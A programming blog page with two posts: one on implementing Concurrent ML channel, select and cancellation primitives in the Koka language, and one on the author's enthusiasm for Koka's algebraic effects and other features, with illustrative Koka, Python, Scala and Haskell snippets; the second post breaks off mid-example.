GFX::Monk

Concurrent ML and Koka

2026-01-11T00:00:00+11:00

This post summarises some recent experiments and learnings around concurrency & Koka. There’s no immediate application yet, just a bunch of thoughts which might be interesting if you’re into concurrency, parallelism, or Koka. If you’ve never heard of Koka before that’s OK, you don’t really need any prior knowledge (but I wrote about it here).

Koka and concurrency:

There are a few active avenues of interest when it comes to Koka and concurrency.

First, there’s the async effect, currently implemented in the community stdlib. That effect allows a function to suspend execution and await the result of a callback, and to execute multiple async operations concurrently. It’s basically an implementation of the async / await semantics in JS and many other languages, but as a library (rather than built into the compiler). Currently this only supports Koka code compiled with the JS backend. Under the hood, an async operation is represented as a continuation function - when the operation is complete, that function is invoked and (from the perspective of the Koka code you write) the async code resumes from where it left off.

There’s also work going on to create libuv bindings for Koka. There’s a fully-featured attempt in this community repo, as well as a more minimal version in Koka itself with just the core scheduling primitives. This work allows execution of async Koka code in compiled binaries (the C target).

Both of these are currently limited to single-threaded concurrency, i.e. concurrency-without-parallelism. This is nothing to sneeze at: it’s done well enough for NodeJS for more than a decade, and it’s a step up from many scripting languages which only support synchronous IO.

Koka and parallelism:

But at the same time, Koka has some great fundamentals when it comes to true parallelism (with multi-threading). The way to share mutable state is via a ref, which is already thread-safe. And Koka’s reference counting algorithm was designed to perform well for both single and multi-threaded environments.

All this is to say: single-threaded concurrency is cool and all, but there’s no technical reason Koka couldn’t support true parallel concurrency like Go, Rust, OCaml and Guile Scheme.

What’s Guile Scheme? Don’t ask me, I’ve never used it. But I think of it often when it comes to concurrency. Years ago, I read Andy Wingo’s excellent series on implementing Concurrent ML primitives in Guile Scheme. It’s stayed in the back of my mind as an interesting point in the concurrency design space, and seems to keep coming up as a lesser-known approach which ought to be more widely known and adopted. See also Concurrent ML has a branding problem, where the tl;dr is “Concurrent ML’s primitives are great but the terms used to describe it are confusing so people ignore it”.

Implementing CML primitives in Koka

Using Andy’s blog (and the Guile fibers library) as a guide, I’ve been implementing CML primitives in Koka. I have a branch here if you’re curious, which works with the above libuv basics branch of Koka. I wouldn’t spend much time trying to read or understand it, though.

This has been a fun experiment, and I don’t expect it to go anywhere soon. But I’ve learnt some things from it, which I think are worth sharing.

Cancellation in asynchronous code

I care a lot about cancellation. To me, a language without robust support for cancellation of async operations is not a serious language. Any non-toy implementation of happy eyeballs (the “hello world of concurrency”) requires cancellation so that it doesn’t leak resources.

A while back I wrote a PR to make async cancellation first-class. The semantics here are based on Scala’s fs2, which I know fairly well.

But one problem which always bugs me is that if you’re waiting for the first of two operations, they might both happen. Say you’re waiting for input on two sockets:

val message = firstof(
	{ socket1.next-message() },
	{ socket2.next-message() }
)

When the first async branch completes, the second will be canceled, and cancellation hooks will run. But this isn’t atomic, and I don’t think it can be. If different messages arrive on socket1 and socket2, then they’ll both trigger completion of the overall async expression. Only one will win, and the other one will get canceled. But at that point it’s too late - we’ve already read the message off that channel and effectively discarded it.
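The same failure mode can be reproduced outside Koka. Below is a minimal sketch using Python's asyncio as a stand-in (this is not Koka's async API): `first_of` and `demo` are hypothetical names, and the two queues merely play the role of sockets that each already have a message waiting.

```python
import asyncio

async def first_of(*coros):
    """Return the first result and cancel whatever is still pending."""
    tasks = [asyncio.ensure_future(c) for c in coros]
    done, pending = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
    for task in pending:
        task.cancel()  # too late for any task that has already finished
    winner = next(t for t in tasks if t in done)  # earliest-listed finished task
    return winner.result(), len(done)

async def demo():
    # Queues stand in for sockets; each already has one message waiting.
    socket1, socket2 = asyncio.Queue(), asyncio.Queue()
    socket1.put_nowait("from socket1")
    socket2.put_nowait("from socket2")
    message, finished = await first_of(socket1.get(), socket2.get())
    # Report the returned message, how many branches finished,
    # and how many messages are left in each queue.
    return message, finished, socket1.qsize(), socket2.qsize()

if __name__ == "__main__":
    print(asyncio.run(demo()))
```

In this setup both branches finish before the race is decided, so both queues end up empty even though only one message reaches the caller. Cancelling the loser afterwards cannot put its message back.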

In this case there are obviously ways around it, like feeding all messages from both sockets into a single channel and reading messages off that, or simply processing each socket in its own async loop.

Cancellation in CML (Concurrent ML)

Cancellation in CML seems much more elegant. In a CML select, there is a known set of operations which are awaiting completion, and only one will complete.

Specifically, if you have two CML channels and you select over both of them, like so:

val message = select(
	channel-1.receive-op(),
	channel-2.receive-op()
)

Then it is guaranteed that only one message will be consumed. If messages arrive on channel-1 and channel-2 at the exact same time, they’ll race to commit these receive operations, and only one will succeed because the operations are both associated with a single opstate ref.

For whichever channel was not selected, the corresponding send-op remains suspended and is not lost; it just waits around for another receive-op to pair with.

This is good. This feels like a proper system, as opposed to “a bunch of things that happen”.

It also seems efficient, as many of the operations handle cancellation for free (e.g. a channel send operation will naturally clean up cancelled receive operations as part of its execution logic).

Some CML operations don’t get cancellation for free, which somewhat blurs the line between a CML operation and an async evaluation. For example a timeout creates a runtime resource (a timer). If we don’t clean these up we may leak timers. They’d resolve to a harmless no-op so it’s not a correctness issue, but repeated use could result in a significant number of unwanted timers consuming resources.

What is this?

When dealing with a new concept, it can be helpful to explain it as “X but Y”. Having now implemented parts of CML, the simplest way I can describe a CML operation is:

a single async suspension (i.e. some code which will be resumed via a callback)
… with an opstate reference that’s shared among all operations in the current scope (i.e. all operations in a select())

This opstate is a reference which can have the values Waiting, Claimed and Done. Completing an operation involves atomically transitioning from Waiting -> Done, and there’s a half-committed Claimed state which serves as a transitory state when attempting to complete an operation in a way that may not succeed (i.e. it could transition back to Waiting).

CML ensures that only one among a set of possible operations succeeds, by sharing the same opstate among all alternative operations. If you select between two receive operations on two different channels, then only one can be completed - code attempting to complete the other will be racing to modify the same opstate, and fail.
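To make the state machine concrete, here is a rough sketch in Python rather than Koka. Everything in it is an assumption for illustration: the names `OpState`, `try_complete` and `race` are made up, and a lock-protected compare-and-set stands in for whatever atomic primitive a real implementation would use.

```python
import threading
from enum import Enum

class State(Enum):
    WAITING = "waiting"
    CLAIMED = "claimed"
    DONE = "done"

class OpState:
    """Shared by every alternative in one select(). The lock emulates an atomic CAS."""
    def __init__(self):
        self._state = State.WAITING
        self._lock = threading.Lock()

    def compare_and_set(self, expected, new):
        with self._lock:
            if self._state is expected:
                self._state = new
                return True
            return False

    @property
    def state(self):
        with self._lock:
            return self._state

def try_complete(opstate, can_commit=lambda: True):
    """Try to complete one alternative; at most one caller ever gets True."""
    while True:
        if opstate.compare_and_set(State.WAITING, State.CLAIMED):
            break                      # we hold the half-committed claim
        if opstate.state is State.DONE:
            return False               # another alternative already won
        # Otherwise someone else holds a claim that may still roll back: retry.
    if can_commit():
        opstate.compare_and_set(State.CLAIMED, State.DONE)
        return True
    opstate.compare_and_set(State.CLAIMED, State.WAITING)  # roll the claim back
    return False

def race(n_threads=8):
    """Let several threads race to complete alternatives sharing one opstate."""
    opstate = OpState()
    wins = []
    barrier = threading.Barrier(n_threads)

    def worker(i):
        barrier.wait()                 # start all threads together
        if try_complete(opstate):
            wins.append(i)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return wins, opstate.state
```

However many threads call `try_complete` on the same `OpState`, only one of them sees `True`, which is the property that prevents a second message from being consumed. The `can_commit` callback models the case where a claim has to be abandoned and the state returns to Waiting.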

Why doesn’t all async code have an opstate?

Now that I understand the key difference, it’s time to wonder why we don’t just do this all the time, if it’s so neat?

It turns out, using an opstate to select between alternatives is of limited use. In Koka, the async effect describes code which may suspend. Chaining together two async functions results in an async function, with an arbitrary number of suspension points.

e.g. the following code is async:

val message1 = channel.receive()

But the following code is also async:

val message1 = channel.receive()
val message2 = channel.receive()

The second snippet composes two async operations into another async operation. It’s impossible to tell how many async suspensions might be involved. But an opstate represents a single operation. It’s either Waiting or it’s Done. If a piece of async code suspends at 3 different points, which one represents Done?

CML cannot compose operations

So if we want to use this approach for arbitrary async actions, we’d need to split them into individual operations, where each can suspend at most once, and the operation is Done when it resumes (or completes without suspending).

This is what CML does. It’s a little confusing, because CML is “composable” in that multiple operations can be composed into a single operation which chooses only one sub-operation (that’s the select operation). But this seems to be the only kind of composition possible: you can’t sequence CML operations into larger atomic operations.

Most operations don’t need to be atomic

Atomicity sounds great, but the more I’ve thought about it, there’s quite a limited set of places where it matters. One is obviously channel receive operations, because taking a message from a channel only to have it go unused is clearly bad. And the same likely goes for channel send operations, although it’s less obvious when that would be a practical concern.

But… is that all? Maybe it is.

Many async operations either can’t be atomic, or don’t need to:

Remote interactions (like connecting to a server): it’s impossible for the counterpart to observe or respect the opstate, and typically you’ll dispose the entire connection if you abandon the code path that establishes a connection
Reading files / sockets: the read operation can’t easily “put the bytes back in the pipe” if the operation is already completed when they arrive.
To work around this you can stream the contents into a channel, and read from that.
Timeouts: the counterparty to the operation (the clock) doesn’t care if the operation happens or not. When the configured time passes, it generates an event. If that event goes unused, it has no effect on the clock.
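The "stream it into a channel" workaround can be sketched as follows, again with Python's asyncio standing in for Koka. The `pump` and `demo` names are hypothetical, and the source queues are placeholders for real sockets or files.

```python
import asyncio

async def pump(source, merged, label):
    """Forward every message from one source into the shared queue."""
    while True:
        message = await source.get()
        # `merged` is unbounded, so this put never suspends and the message
        # cannot be dropped between the get above and the put here.
        await merged.put((label, message))

async def demo():
    socket1, socket2, merged = asyncio.Queue(), asyncio.Queue(), asyncio.Queue()
    pumps = [
        asyncio.ensure_future(pump(socket1, merged, "socket1")),
        asyncio.ensure_future(pump(socket2, merged, "socket2")),
    ]
    socket1.put_nowait("a")
    socket2.put_nowait("b")
    # The consumer reads from one place only, so there is no race to lose.
    received = [await merged.get(), await merged.get()]
    for p in pumps:
        p.cancel()
    await asyncio.gather(*pumps, return_exceptions=True)
    return sorted(received)

if __name__ == "__main__":
    print(asyncio.run(demo()))
```

The non-atomic reads stay inside the pumps, where nothing ever races against them. The consumer only performs reads on the merged queue, which is the one place that would need atomic semantics.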

There may be some circular logic in here - the advice “if you need the operation to be atomic, use a channel” incidentally ensures that only channels need to support atomic operations. But still, I don’t think the majority of async operations benefit from atomic guarantees in practice.

… But atomic operations should be completable by non-atomic ones

One last thing to mention is that even though a timeout doesn’t need to be atomic, it’s important that it can participate in an atomic operation. That is, this should work:

val result: maybe<string> = select([
	channel.receive().map(Just),
	timeout(1.second).as(None)
])

If the channel receive happens to occur in parallel with the one-second timeout and the receive wins, then that’s fine, the timer won’t be offended. But if the timeout wins, we want the channel receive to not happen, so that we don’t lose a message sent to the channel.

So while only channel operations seem to need to be atomic, we do want arbitrary other async operations that we’ll select() over to be atomic-aware. If an atomic operation loses the race, we want to prevent its side effects from occurring.
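As a small illustration of the property being asked for (not of how CML implements it), Python's thread-safe `queue.Queue` already couples a receive with a timeout so that exactly one of them happens. The helper names below are made up for the example.

```python
import queue

def receive_or_timeout(channel, seconds):
    """Either take one message or report a timeout, never both."""
    try:
        return ("message", channel.get(timeout=seconds))
    except queue.Empty:
        return ("timeout", None)

def demo():
    channel = queue.Queue()
    first = receive_or_timeout(channel, 0.05)   # nothing sent yet: the timeout wins
    channel.put("late message")                 # arrives after the timeout fired
    second = receive_or_timeout(channel, 0.05)  # still there for the next receive
    return first, second

if __name__ == "__main__":
    print(demo())
```

When the timeout wins, the receive has not happened, so a message sent afterwards is still in the channel for the next receiver. The timer itself needs no atomicity of its own; it only has to lose cleanly.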

What would this look like in Koka?

I wasn’t really sure where this experiment would take me when I started. How does the current async effect and the world of CML fit together, if at all? Should CML become the new basis for asynchronous code in Koka?

The answer is much narrower, which is kind of a relief. If we want to support atomic channel operations, they will need to be first class values, representing a single operation. And it should be possible to select between a combination of async expressions and channel operations.

// either an atomic operation or arbitrary async code
type operation<a>
	AtomicOp(...) // an atomic channel operation
	AsyncOp(f: () -> async a) // wrapper for arbitrary async code

// Return the result of the first operation, canceling all others.
// AtomicOps in this list will occur atomically, but AsyncOps will not.
fun select(operations: list<operation<a>>): async a
	...

Unfortunately, there’s no way to have this function be useful and have straightforward semantics. We want to support async operations, but it will also be possible to apply a single atomic operation, with a function like: fun perform(operation: operation<a>): async a. Which means that we can’t stop someone from doing this:

select([
	channel-1.receive-op(), // AtomicOp
	{ perform(channel-2.receive-op()) }, // AsyncOp
	timeout(1.second),
])

This will mostly work, but with the subtle problem that the receive-op on channel-2 is non-transactional, now that it’s placed within an opaque async expression. And code that wishes to perform multiple channel operations in sequence can only be written as an AsyncOp, again removing the ability to operate atomically.

These are difficult and subtle distinctions to convey to a user, unfortunately. It’s not clear that the benefits would be worth the confusion.

Alternative design: enforce single operations

A more drastic approach would be to remove the ability to race/select() over arbitrary async code, and require that all select operations occur on only singular operations like “channel receive”, “timeout”, etc. Without digging in too deeply, I think this is what Guile does. You can’t define an operation which is “run this async code”, because in Guile async code is initiated by spawning fibers. The operation you can select over is “join this fiber” (i.e. await its completion), which is a singular operation. So instead of select(fn1, fn2, fn3) you would first start all 3 functions in their own fibers, and then select(fiber1.join, fiber2.join, fiber3.join).

Which actually does have the same problems as I outlined above. If you were to spawn a fiber which just received a single message from a channel, then racing that fiber’s join event with other atomic events would not execute the channel receive atomically. This seems like a less likely mistake to make by accident, because fibers are more tedious to use.

In addition to fibers being more tedious, they typically don’t play well with my other longstanding interest, Structured Concurrency. Koka already supports structured concurrency well, so I think encouraging a fibers-style API would be a big step backwards.

Summing up:

CML is interesting and elegant, and understanding how it works has given me some insights into atomic events in the face of parallel (threaded) concurrency. One day I hope Koka supports true parallel concurrency, at which point we’ll want something like CML’s approach for channels, at least. But exposing atomic cancellation semantics to the user while preserving ease-of-use for arbitrary compositions of async code will likely be a challenge.

I'm excited about Koka

2025-04-13T00:00:00+10:00

It’s been a while since I’ve been excited about a new programming language.

I’ve learnt and used a number of languages, either because of necessity or curiosity, but there have only been a few languages in the past 20+ years where I’ve thought “this could be my new favourite language”.

For a long time Python was my preferred language for its simplicity, and then StratifiedJS for its powerful approach to asynchrony (and JS interop). Since then most of my interest has been in statically typed languages, particularly OCaml and Rust.

I’ve used plenty of other languages for my day job, and I consider myself lucky to have a day job where I’m mostly writing Scala - a really good mix of “powerful language” and “something I can get paid to write”. But I’m a big believer that there should be a language which is great for nearly everything I want to do, and none of those are it.

Koka?

So when I came across Koka recently and realised how strongly it aligns with the kinds of things I like in a language, I got pretty excited! Of course, it’s far too early to know if it will stay that way as the language and ecosystem (hopefully!) grow and become production-ready, but for now I’m very optimistic.

Where I’m coming from

Above I mentioned a few languages which I’ve been impressed with over the years. To give you an idea of what I like (and dislike), here’s a quick overview of my favourite languages and their downsides:

OCaml

I have a soft spot for OCaml - it’s like a dramatically more approachable Haskell. It has a great type system, simple and efficient runtime, and I appreciate the fast startup compared to VM languages.

Downsides: The syntax is hard to love. Lack of typeclasses or implicits means you’re forever specifying which map function to call (List, Array, Lwt, etc), so code tends to be verbose and hard to refactor. Composing the appropriate functions every time you want to log some arbitrary structure can be amazingly frustrating. Build tooling is pretty nice these days with dune, but package management with opam is still quite painful.

Rust

Rust is an absolutely brilliant language. If I were writing low-level OS code or performance-critical code, I’d use Rust, no question. The power-to-convenience ratio is amazing. Cargo is great.

Downsides: The convenience doesn’t necessarily extend to many FP idioms. Rust gives you the tools to do things right, but it can take a lot of work. Basically, Rust can do high-level things (like async) but it still forces a lot of low-level concerns to permeate your codebase, which you don’t want or need to care about if efficiency isn’t your number one priority.

Scala

Scala has a high quality, reliable and extensive FP ecosystem. You can do pretty much anything in Scala, and the language is powerful enough to implement all kinds of useful abstractions.

Downsides: it’s a broad, complex language which can be hard to teach and navigate. The JVM legacy makes it a poor fit for CLI applications - it’s fast to run, but slow to start. FP purity is a matter of diligence, it’s incredibly easy to violate expectations by invoking code that throws exceptions, uses mutation, blocks the thread etc. Also I hate dealing with sbt, but it’s too entrenched to make me seriously consider alternatives.

Koka: Functional Programming with algebraic effects

Koka is a functional programming language. It’s eager like OCaml, not lazy like Haskell. It uses reference counting instead of a Garbage Collector.

And the big ticket item: it is built around algebraic effects - “koka” is Japanese for “effect”. Rust spent most of its innovation tokens on ownership; Koka spends them on effects.

(I’m aware that OCaml 5 has dynamically typed algebraic effects, which are interesting but much less so than statically typed ones, to me at least)

Algebraic effects: power

Algebraic effects is a bit of an obtuse name; they’re best understood from a mechanical perspective as “resumable exceptions”. With exceptions you can throw an exception and have it propagate up the stack to the nearest catch statement. From there you can run some more code and then return or throw another exception.

Effects allow you to call some function that the effect defines, and have that propagate up the stack to the nearest handler. As with catch, you can run some code and then return, but there’s another option: you can resume the code that threw the exception, as if the throw were calling a function and receiving its result. But it’s not a function you have a (lexical) reference to, it’s a function which is resolved dynamically via the callstack.
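For readers who know Python better than Koka, generators give a rough feel for the "resumable" part. This is only an analogy under stated assumptions: `handle`, `greet` and the two handlers are invented for the sketch, the handler is passed in explicitly rather than found on the call stack, and a Python generator can only be resumed once from each suspension point.

```python
def greet():
    # Each `yield` performs an effect: execution pauses until a handler answers.
    name = yield ("ask", "name")
    language = yield ("ask", "language")
    return f"{name} likes {language}"

def handle(computation, handler):
    """Run a generator, routing each yielded request through `handler`."""
    gen = computation()
    try:
        request = next(gen)                # run until the first effect
        while True:
            action, value = handler(request)
            if action == "abort":          # like catch: abandon the computation
                gen.close()
                return value
            request = gen.send(value)      # like resume: continue where it paused
    except StopIteration as finished:
        return finished.value              # the computation returned normally

def answer_all(request):
    answers = {"name": "Ada", "language": "Koka"}
    return ("resume", answers[request[1]])

def give_up(request):
    return ("abort", f"no answer for {request[1]}")

if __name__ == "__main__":
    print(handle(greet, answer_all))
    print(handle(greet, give_up))
```

With `answer_all` the computation is resumed twice and runs to completion. With `give_up` the handler behaves like an ordinary catch block and the rest of `greet` never runs.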

Obviously for exceptions resuming is a terrible idea, but it’s extremely powerful for other types of control flow. The easiest to appreciate is async. A number of languages support async/await syntax which allows you to write synchronous-looking code with asynchronous runtime behaviour. Adding this to a compiler is a massive undertaking.

But adding async in Koka amounts to a few hundred lines of code, none of it in the compiler. Effects allow everyday library code to implement an async system which captures a continuation and hands that off to the underlying scheduler, while having the surface syntax unchanged from synchronous code. The only change is the addition of async to the set of effects a function requires.
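The idea of "capture a continuation and hand it to a scheduler" can be shown in miniature. The sketch below is Python, not Koka, and is not how the Koka async library is written: a suspended generator plays the role of the captured continuation, and `run_all` is a hypothetical round-robin scheduler written as plain library code.

```python
from collections import deque

def worker(name, steps, log):
    """Looks like straight-line code, but suspends at every `yield`."""
    for i in range(steps):
        log.append(f"{name}:{i}")
        yield  # suspend; the scheduler now holds the rest of this function

def run_all(tasks):
    """Round-robin scheduler: resume each suspended task in turn until all finish."""
    ready = deque(tasks)
    while ready:
        task = ready.popleft()
        try:
            next(task)          # resume the continuation
        except StopIteration:
            continue            # task finished, drop it
        ready.append(task)      # task suspended again, requeue it

def demo():
    log = []
    run_all([worker("a", 2, log), worker("b", 3, log)])
    return log

if __name__ == "__main__":
    print(demo())
```

The two workers interleave even though neither contains any scheduling logic, and the scheduler is ordinary library code with no compiler support beyond the ability to suspend and resume.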

Many languages do support async/await but lack support for related concepts like cancellation. I love that in Koka this (and many other interesting execution concepts) is a library concern which lends itself to experimentation and evolution, rather than something that can only be implemented as a huge modification to both the language and compiler.

Algebraic effects: usage

Effect types never apply to values, only to functions. fun foo(): io () means that foo returns unit, but requires the io effect in order to evaluate. There is no such thing as an io () value. When you call a function, you can only do so if the effect is available, and the result you get back is the value type.

An effect can be “available” in two ways. The most common way is that the caller also requires that effect. Just like in monadic programming, if you’ve got an IO<()> then you’ll also need to return an IO<_>. With effects you will only call an io () function from another io function.

An effect can also be available by handling it. io can only be handled by the runtime, but other effects can be handled in user code. e.g. the exn effect represents the ability to throw exceptions:

fun inner(): exn ()
  throw("oh no!")

fun outer(): error<()>
  // handle `throw-exn` (fail) and `return` (succeed) for the `exn` effect
  with handler <exn> {
    final ctl throw-exn(e) { Error(e) }
    return(value) { Ok(()) }
  }
  inner()

The outer function does not need the exn effect, because it’s handled that effect for inner and turned it into an error type with Ok / Error variants. In practice you’d just use the try function to handle errors rather than writing an exn handler, this is just for illustration.

So far, that’s just monads with a different syntax. But the crucial part of effect types is how they compose - a function has a set of effects. So you might have foo(state: ref<global>): <exn,st<global>> (). That means foo can fail (exn), and it needs to read and write to the global heap. Here state is a mutable reference cell, and reading or writing it requires the corresponding read or write effect; st is just an alias for read, write and alloc, for reading, writing and creating refs.

In monad-land, this is where we might enter monad transformer territory, with a StateT IO maybe? Or an IOT State? I don’t know. But in Koka, it’s just two effects that we need. And there’s no need to wrap / unwrap the various layers of a monad to get at the “right” effect level, you simply call functions that require effects, and the result is a function requiring all the effects you depend on.

To illustrate the difference, here’s an example which combines state and errors in Haskell. I borrowed it from this article, because I have done a bit of Haskell but I still couldn’t write this myself:

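import Control.Monad.State (StateT, get, modify)
import Control.Monad.Trans.Class (lift)
import Data.Map (Map)
import qualified Data.Map as Map

type StoreM = StateT (Map String Int) (Either String)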

note :: a -> Maybe b -> Either a b
note msg = maybe (Left msg) Right

save :: String -> Int -> StoreM ()
save k v = modify (Map.insert k v)

load :: String -> StoreM Int
load k = do
  store <- get
  lift $ note ("the key " ++ k ++ " is missing") (Map.lookup k store)

operation :: StoreM Int
operation = do
  save "x" 1
  save "x" 2
  save "y" 123
  x <- load "x"
  y <- load "y"
  save "z" (x + y)
  load "z"

operation and save are straightforward, but I wouldn’t be able to write load and note without reading a few docs first.

Here’s the equivalent Koka code, which is pretty straightforward once you know Koka’s syntax:

alias stored = hash-map<string, int>
alias store = ref<global, hash-map<string, int>>

fun save(store: store, k: string, v: int): st<global> ()
  store.modify fn(s)
    s := s.insert(k, v)

fun load(store: store, k: string): <exn,read<global>> int
  match (!store).get(k)
    Just(v) -> v
    Nothing -> throw("the key " ++ k ++ " is missing")

fun operation(store: store): <exn,st<global>> int
  store.save("x", 1)
  store.save("x", 2)
  store.save("y", 123)
  val x = store.load("x")
  val y = store.load("y")
  store.save("z", x + y)
  store.load("z")

I think this is an absolutely wonderful improvement for readability and general understanding, as well as type inference. There’s simply so much less manual machinery to think about. And thinking of “the set of effects I require” feels quite natural.

There’s one odd thing here: it feels very OOP. This feels jarring because humans are pattern recognition machines, but it still is FP, and I believe it retains all the important benefits of FP. Speaking of…

Effects: no more referential transparency?

A quick refresher: referential transparency means you should be able to substitute an expression for a variable-holding-that-expression without changing semantics.

So in Scala, there’s no difference between these two pieces of code:

def foo(): IO[Unit] = ???

// foo happens twice
doItTwice(foo(), foo())

// foo still happens twice
val action: IO[Unit] = foo()
doItTwice(action, action)

In Koka, that’s not true (but it also wouldn’t type-check, so at least it’s not an accident waiting to happen). Calling foo() evaluates its effects, and gives you the result. If you want to defer that you can pass the unevaluated function doItTwice(foo, foo), or have val action be an anonymous lambda. You can use braces (suspenders!) to write a zero-argument lambda, so these two are equivalent:

val action1 = fn() foo()
val action2 = { foo() }

I’m not sure how this one sits with me. Some would say a language without referential transparency is not a “real” FP language. But I’m not sure how much it matters in practice. Maybe it is still referentially transparent, if you argue the difference between IO[T] and T is equivalent to the difference between () -> io T and T. If you alias IO<t> = () -> io T, that would be awful for ergonomics but would it count as referential transparency? Not sure.

Either way, I’m fine with this in practice since it’s responsible for much of the readability gains in effect-using code.

Other features

Beyond algebraic effects, Koka has a handful of other distinguishing features:

No Garbage Collector

I flip-flop between this being a minor detail and a huge deal. Koka uses reference counting which is technically garbage collection, but it doesn’t have the overheads and unpredictability associated with a tracing GC. It’s also technically possible to create cycles, but thanks to its FP and lack of general mutation, this is much less likely to be a problem in practice compared to e.g. Swift.
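The cycle caveat is easy to observe in another reference-counted runtime. The sketch below uses CPython, which pairs reference counting with a separate cycle collector; switching that collector off leaves pure reference counting. This is CPython-specific behaviour and says nothing about Koka's runtime beyond the general principle. The `Node` class and function names are made up for the example.

```python
import gc
import weakref

class Node:
    def __init__(self):
        self.other = None

def acyclic_is_freed_immediately():
    gc.disable()                  # leave only reference counting active
    try:
        a = Node()
        probe = weakref.ref(a)    # lets us observe whether the object still exists
        del a                     # refcount hits zero, object is freed right away
        return probe() is None
    finally:
        gc.enable()

def cycle_survives_refcounting():
    gc.disable()
    try:
        a, b = Node(), Node()
        a.other, b.other = b, a   # a <-> b form a reference cycle
        probe = weakref.ref(a)
        del a, b                  # each object is still referenced by the other
        leaked = probe() is not None
        gc.collect()              # an explicit cycle-collection pass reclaims them
        freed = probe() is None
        return leaked, freed
    finally:
        gc.enable()

if __name__ == "__main__":
    print(acyclic_is_freed_immediately())
    print(cycle_survives_refcounting())
```

Acyclic data is released deterministically the moment the last reference goes away, which is the attractive part. The cycle is only reclaimed by a separate pass, which is why a language that rarely creates cycles is a good fit for reference counting.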

Koka’s reference counting uses some clever techniques to be competitive (in select benchmarks) with the best garbage collectors, while requiring much less runtime code and fewer decades of cutting-edge engineering investment.

Ultimately I’ve enjoyed how lean and embeddable Rust is, and Koka gives me the same vibes in a much higher level language. For performance sensitive use cases you’re more likely to want to embed Rust than Koka, but using WASM for frontend code is an embedding use case where Koka should be much nicer than Rust.

Dot selection

obj.function(value) is always syntactic sugar for function(obj, value). This gives a natural left-to-right flow of methods as in OOP, but without the complexity of juggling both instance methods and functions. Some OOP languages have ways to add extension methods to classes they didn’t define, but in Koka that’s just writing a function which accepts the given type as its first argument.

This left-to-right ordering makes IDE support nicer, since writing the value first allows the suggestions to be narrowed down to functions that accept that type, similar to OOP methods.

It does mean that any functions which are generic in the first argument will always be a valid suggestion, which could be noisy. Scala has similar problems with extension methods you can call on any value; IDEs present these as low priority suggestions. Koka should be able to do the same (maybe it already does).

OCaml (and many others) have a similar chaining operator where you can write obj |> method(value) as syntactic sugar for method(value, obj). But that feels like an afterthought in OCaml which is used (and useful) inconsistently, whereas dot syntax is idiomatic and universal in Koka.

Qualified names and overloading

In OOP, the namespace of “possible function names” is per-class - different classes can use the same name without colliding. In FP, there are a lot of functions in one big shared namespace. If you have a map function, then either:

You need to qualify it everywhere, like OCaml’s List.map(...)
You need some system whereby the one and only map function does the right thing for any structure which supports the concept of “mapping”, like Haskell’s typeclasses

Koka has a novel approach: functions and variables can all have qualified names, like list/map and array/map. Both can be referred to as map, but you can explicitly use list/map if you need to disambiguate. But Koka also has support for overloading, where it’ll automatically pick the correct map function if there’s only one in scope which matches the argument types given. So if you call map(somelist, ...) that’s going to select list/map without you needing to disambiguate.

Modules can be used to disambiguate, so you often don’t need to define the function using a qualified name. If you write a function called map in the list module, it can be referred to as list/map.

This felt weird at first, but after a short time feels like a nice way to balance “one big namespace” with “simple function names”, without the complexity of Haskell’s typeclasses. The one downside is that errors can be a little tougher since if the call doesn’t match any function, you get all the possibilities listed. But you can (temporarily) disambiguate with the full name to get a more specific error message.

Implicit arguments

Koka supports implicit arguments which are resolved by a combination of both name and type, unlike Scala which only considers the type of an implicit argument. Here’s an example of an implicit in Scala:

object Foo {
  implicit val show: Show[Foo] = ???
}

def print[T](value: T)(implicit S: Show[T]): Unit = {
  println(s"Here is a ${S.show(value)}")
}

The equivalent in Koka would be:

fun foo/show(value: foo) { ... }

fun print<a>(value: a, ?show: (a) -> string) {
  println("Here is a " ++ show(value))
}

Because Scala’s implicit requires exactly one instance of a given type to be found, it adds extra ceremony (marking values as implicit) to avoid polluting the search space.
There’s also a complex resolution process (e.g. companion objects of the type in question will be searched, even if they’re not in scope).

With Koka, implicits have to match the name and type. And all that’s searched is the lexical scope, there are no extra rules. Because of qualified names, it’s possible to have many functions called show. If there’s only one that accepts a foo type, then that’s the one it uses! If there are multiple (or none), you’ll need to specify one explicitly.

This does increase the chances of implicitly resolving a value which happens to be in scope, but not intended for that purpose. But given that the name also needs to match, it doesn’t seem too likely in practice.

It can also mean that you need additional imports. E.g. currently the hash functions for various types are defined in std/data/hash, so you need to import that in order for those symbols to be available for hash-map functions. This is all part of the community stdlib right now, it’s likely these hash functions would be defined more centrally once they become part of the official stdlib.

Cohesion and simplicity

One of Koka’s principles is minimal-but-general. Many languages (especially those which are young and not burdened with decades of production use) claim similar things, so I was prepared to be underwhelmed. Lest we forget, one of the most complex build tools ever created was originally called Simple Build Tool.

It probably didn’t help that the “language basics” section started by describing all the various syntactic sugars which make parts of the syntax optional in certain situations, giving many different ways to write the same thing. I think these are useful and important for the “general” part of koka’s goals, but it does stand in contrast to the “minimal” goal.

I hope things go well enough that we see how these goals pan out after decades of supporting production use cases, but right now I buy it.

The effects system is clearly more general than other languages which have bespoke support for async, exceptions, and other specialized control flow.

And the features it does have tend to work well together. a.map(...) would not be that useful if there could only be one function in scope called map, nor would it be useful to require an implicit show parameter if there could only be one such function in scope.

Qualified names allow a much broader namespace because names can overlap, and the type level constraints provide a pragmatic way to extract the right thing out of those overlapping definitions. I don’t know how often in practice this will be better or worse than the explicitness of objects and instance methods, but it’s clearly much simpler and more uniform, which I appreciate. It’s also the simplest approach I’ve seen to resolve the “one big namespace for functions” constraint that all FP languages have.

Performance

I like the fact that Rust is so efficient, but Rust makes a lot of tradeoffs to get there. This is probably not the right tradeoff for me most of the time. To be honest, for the kinds of things I do Haskell and OCaml are perfectly fine performance-wise without bogging down logic with memory management concerns. In some cases I’m comparing performance to languages like ruby and python, where being “fast” is a comically low bar.

So while I don’t often need a high performance language, it feels nice to have that option. Koka’s creator has devoted a fair bit of research and effort into specific optimisations which can make (some) idiomatic FP code compile to a form which is competitive with C, which feels like a pretty good balance of “the compiler cares about this” but “I don’t have to constantly care about this”.

Koka: the hard parts

So far I’ve mostly been playing around with the effects side of Koka, since that’s the novel part I want to understand better. These are some issues I’ve run into so far:

You can’t refer to generic type parameters in the function body

When the compiler says my types are incorrect, I often like to annotate parts of them in order to close the gap between what I think and what the compiler thinks types are. In Koka, there seem to be a lot of situations where you can’t actually write a type down, which makes this hard.

I think the main cause for this is that type parameters in the function type are not bound in the function body. So this annotation (of val result) is incorrect:

fun singleton<a>(value: a): list<a>
  val result: list<a> = [value]
